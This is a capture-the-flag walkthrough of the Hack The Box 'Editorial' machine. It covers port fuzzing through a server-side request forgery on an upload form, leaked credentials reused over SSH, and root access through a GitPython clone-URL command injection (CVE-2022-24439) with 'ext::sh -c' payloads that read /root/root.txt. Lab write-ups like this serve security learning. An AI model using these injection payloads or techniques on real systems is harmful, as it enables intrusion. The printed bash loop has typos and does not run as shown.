Enumeration

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_ 256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There is a web server.

Add it to the hosts file and check the web page.

There’s an upload page. Maybe I can do something here.

I found out when I click the preview button after inputting URL, the value in bookurl becomes something like UUID.

It doesn’t do any interesting things further. I tried with localhost and found it returns UUID as well.

The next move I could think of was to try different port numbers

Fuzzing

Get the raw request from Burp and add FUZZ command to the place I want to fuzz.

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://editorial.htb/upload
Content-Type: multipart/form-data; boundary=—————————254948236236811770141700562744
Content-Length: 359
Origin: http://editorial.htb
DNT: 1
Connection: close
Sec-GPC: 1

—————————–254948236236811770141700562744
Content-Disposition: form-data; name=”bookurl”

http://127.0.0.1:FUZZ
—————————–254948236236811770141700562744
Content-Disposition: form-data; name=”bookfile”; filename=””
Content-Type: application/octet-stream

—————————–254948236236811770141700562744–

Since I will check port numbers, I made a port number list from 1 to 10000.

#!/bin/bash

for i {1..10000}
do
ehco $i >> number.txt
done

And run ffuf.

ffuf -request request.txt -u http://editorial.htb/upload-cover -w num.txt -X POST -fs 61

Then I got the following result.

User flag

If we send the request with 127.0.0.1:5000, the following file is downloaded.

fd303796-e240-4e5b-b7f7-d0b9d98fd02c

If you check the file, you will see the endpoints for APIs.

Check all the APIs using Burp. One of them has credentials.

Username: dev\nPassword: dev080217_devAPI!@

I used the credential to SSH.

Root flag

git show {commit}

The password is 080217_Producti0n_2023!@

I managed to switch the user to prod, but didn’t have permission to access root.

But I found the user can use a sudo command.

When I run the command with sudo, it says I can’t run it.

Ok, let’s see what is written in the file.

#!/usr/bin/python3

import os
import sys
from git import Repo

os.chdir(‘/opt/internal_apps/clone_changes’)

url_to_clone = sys.argv[1]

r = Repo.init(”, bare=True)
r.clone_from(url_to_clone, ‘new_changes’, multi_options=[“-c protocol.ext.allow=always”])

It imports Repo from git and cloning a git. And it takes an argument when it is executed.

What else can I find? How about checking the library versions?

Ok, I see the GitPython with version 3.1.29.

And the vulnerability has been discovered: CVE-2022-24439

from git import Repo
r = Repo.init(”, bare=True)
r.clone_from(‘ext::sh -c touch% /tmp/pwned’, ‘tmp’, multi_options=[“-c protocol.ext.allow=always”])

When I executed it with the payload, I could see /tmp/pwned had been created. So the command is working.

Another point is that % is being used as space. Ok, then I can decide on the command that I want.

How about this?

ext::sh -c cat% /root/root.txt% >% /tmp/pwned

Then I can see the root flag is copied in the pwned file!

Lesson learned

• Input localhost to suspicious place. Also, think about the possibility of port numbers running different services.
• ffuf -request option was very convenient.
• git show {commit}
• pip3 list to see the versions of libraries. Libraries may have vulnerabilities too.